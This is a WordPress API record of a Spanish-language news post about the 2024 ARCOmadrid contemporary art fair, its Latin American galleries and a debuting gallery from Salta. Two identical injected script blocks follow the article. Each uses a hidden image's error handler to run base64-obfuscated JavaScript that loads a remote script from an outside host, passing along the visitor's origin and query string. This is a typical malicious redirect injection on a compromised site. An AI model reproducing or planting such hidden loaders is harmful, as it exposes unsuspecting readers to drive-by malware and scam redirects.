{"id":3747,"date":"2024-02-22T10:26:55","date_gmt":"2024-02-22T13:26:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3747"},"modified":"2025-08-14T00:00:00","modified_gmt":"2025-08-14T03:00:00","slug":"con-un-30-por-ciento-de-presencia-latinoamericana-arranca-la-feria-arcomadrid","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3747","title":{"rendered":"Con un 30 por ciento de presencia latinoamericana, arranca la feria ARCOmadrid"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-463d4fb5fdca33b9e97db2388e264d81\" style=\"background-color:#0c4160\"><em>La Argentina volver\u00e1 a tener un lugar destacado durante la feria\u00a0con una gran presencia de galer\u00edas de todo el pa\u00eds, los artistas tendr\u00e1n la oportunidad de mostrar su obra al mundo.<\/em><\/h4>\n\n\n\n<p>Del 6 al 10 de marzo se celebrar\u00e1 en la capital espa\u00f1ola la 43\u00aa edici\u00f3n de la feria internacional de arte contempor\u00e1neo ARCOmadrid, que en esta edici\u00f3n contar\u00e1 con la participaci\u00f3n de 205 galer\u00edas de 36 pa\u00edses, de las cuales un 30 por ciento lo acapara la presencia latinoamericana, con especial asistencia de<strong>&nbsp;Argentina, Brasil y M\u00e9xico<\/strong>, se\u00f1al\u00f3 a directora del evento, Maribel L\u00f3pez, en conferencia de prensa.<\/p>\n\n\n\n<p>\u00abARCOmadrid sigue proyectando su posici\u00f3n \u00fanica como referente latinoamericano en Europa\u00bb, describi\u00f3 la directora durante la presentaci\u00f3n a la prensa realizada hoy para anunciar detalles de uno de los eventos m\u00e1s convocantes de la agenda art\u00edstica internacional, que durante cinco jornadas convierte a Madrid en la capital internacional del arte contempor\u00e1neo.<\/p>\n\n\n\n<p>En 2024, la Argentina volver\u00e1 a tener un lugar destacado durante la feria organizada por IFEMA MADRID, gracias a la presencia en el sector principal de las galer\u00edas Herlitzka &amp; Co., Nora Fisch, Pasto, Ruth Benzacar y W Galer\u00eda, mientras que en la secci\u00f3n Opening, dedicada al arte emergente, debutar\u00e1 la galer\u00eda salte\u00f1a Remota y, en el apartado \u00abNunca lo mismo\u00bb, las galer\u00edas Isla Flotante, Sendr\u00f3s y Vigil Gonzales.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\"><p lang=\"es\" dir=\"ltr\">\u201c<a href=\"https:\/\/twitter.com\/hashtag\/ARCOmadrid?src=hash&amp;ref_src=twsrc%5Etfw\">#ARCOmadrid<\/a> se mantendr\u00e1 en el futuro en la primera semana de marzo. La decisi\u00f3n viene por una necesidad de montaje: estamos siendo capaces de llegar a muchos detalles, por ejemplo a la arquitectura, y eso requiere otros tiempos.&quot;<br><br>Maribel L\u00f3pez Zambrana<br>Directora de ARCOmadrid <a href=\"https:\/\/t.co\/CGXGLHeaHa\">pic.twitter.com\/CGXGLHeaHa<\/a><\/p>&mdash; Feria ARCO (@FeriaArco) <a href=\"https:\/\/twitter.com\/FeriaArco\/status\/1760282949868491149?ref_src=twsrc%5Etfw\">February 21, 2024<\/a><\/blockquote><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div><\/figure>\n\n\n\n<p>Con un apartado especial dedicado a \u00abUn Caribe oce\u00e1nico\u00bb, donde participar\u00e1n 19 galer\u00edas -el a\u00f1o anterior el homenaje especial fue para el Mediterr\u00e1neo-, la feria albergar\u00e1 en el sector principal 171 galer\u00edas, adem\u00e1s de los sectores curados, como \u00abOpening\u00bb con quince stands y \u00abNunca lo Mismo\u00bb, dedicado al arte latinoamericano, con doce galer\u00edas.<\/p>\n\n\n\n<p><strong>Curado por Carla Acevedo-Yates y Sara Hermann Morera, el sector \u00abLa orilla, la marea, la corriente: un Caribe oce\u00e1nico\u00bb<\/strong>, presentado como un tema de investigaci\u00f3n, propone una lectura de la compleja intersecci\u00f3n entre la tierra y este mar que se plantea desde y hacia la orilla como un espacio de intercambio y de constante inestabilidad.<\/p>\n\n\n\n<p>Este a\u00f1o, la presencia de galer\u00edas espa\u00f1olas representar\u00e1 el 35 por ciento del total de la oferta, mientras que el segmento internacional constituye el 65% con 132 galer\u00edas-. \u00abDe este porcentaje, el 30 por ciento lo acapara la presencia latinoamericana, con la participaci\u00f3n de 38 galer\u00edas de 13 pa\u00edses, con especial presencia de Argentina, Brasil y M\u00e9xico\u00bb, destac\u00f3 L\u00f3pez.<\/p>\n\n\n\n<p>Espacios internacionales como Max Hetzler, Vera Munro y Air de Paris se suman por primera vez al encuentro madrile\u00f1o, mientras que repetir\u00e1n presencia galer\u00edas como Jocelyn Wolff, Chantal Crousel, Perrotin o Mendes Wood Dm.<\/p>\n\n\n\n<p><strong>La galer\u00eda oriunda de Salta bautizada Remota participar\u00e1 por primera vez en ARCOmadrid<\/strong>, en el espacio titulado \u00abOpening\u00bb que, con curadur\u00eda de Cristina Anglada y Yina Jim\u00e9nez Suriel, apunta a presentar el joven galerismo internacional.<\/p>\n\n\n\n<p><strong>Curada por Jos\u00e9 Esparza Chong Cuy y Manuela Moscoso, la secci\u00f3n \u00abNunca lo Mismo\u00bb, renueva su apuesta por el arte latinoamericano a trav\u00e9s de 12 espacios&nbsp;<\/strong>como A Gentil Carioca, Jaqueline Martins, Vigilgonzales, Isla Flotante, Millan, N.A.S.A.L. y Proyectos Ultravioleta.<\/p>\n\n\n\n<p>Por otro lado, Arts Libris volver\u00e1 a estar presente en ARCOmadrid con m\u00e1s de ochenta editores de veinte pa\u00edses a los que se sumar\u00e1n diferentes presentaciones de publicaciones en el espacio Arts Libris Speaker\u00b4s Corner.<\/p>\n\n\n\n<p>ARCOmadrid pondr\u00e1 en marcha distintas iniciativas para fomentar el coleccionismo, entre las que destaca \u00abFirst Collectors by Fundaci\u00f3n Banco Santander\u00bb, al tiempo que ha invitado especialmente a Madrid a unos 400 coleccionistas de 40 pa\u00edses.<\/p>\n\n\n\n<p>Profesionales y miembros del Centro Pompidou, el MAXXI de Roma, el Palais de Tokyo, el Museo Reina Sof\u00eda, MOLAA de Long Beach, Guggenheim Bilbao y el Whitney Museum of American Art han confirmado su asistencia a la feria, entre muchos otros.<\/p>\n\n\n\n<p>A estos contenidos se unir\u00e1 el Foro de debate, que ampliar\u00e1 el an\u00e1lisis en torno al coleccionismo, los artistas, los museos y el Caribe como temas centrales de investigaci\u00f3n en ARCOmadrid.<\/p>\n\n\n\n<p>La edici\u00f3n 2024 de ARCOmadrid se celebra del 6 al 10 de marzo en los pabellones 7 y 9 del Recinto Ferial de IFEMA MADRID, dedicando las tres primeras jornadas exclusivamente a los profesionales, y a partir de las 15 del viernes 8, abrir\u00e1 sus puertas al p\u00fablico.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/655875-feria-arco-madrid-arte-contemporaneo.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Argentina volver\u00e1 a tener un lugar destacado durante la feria\u00a0con una gran presencia de galer\u00edas de todo el pa\u00eds, los artistas tendr\u00e1n la oportunidad de mostrar su obra al mundo. Del 6 al 10 de marzo se celebrar\u00e1 en la capital espa\u00f1ola la 43\u00aa edici\u00f3n de la feria internacional de arte contempor\u00e1neo ARCOmadrid, que [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3748,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-3747","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3747"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3747"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3747\/revisions"}],"predecessor-version":[{"id":6844,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3747\/revisions\/6844"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3748"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3747"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3747"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3747"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}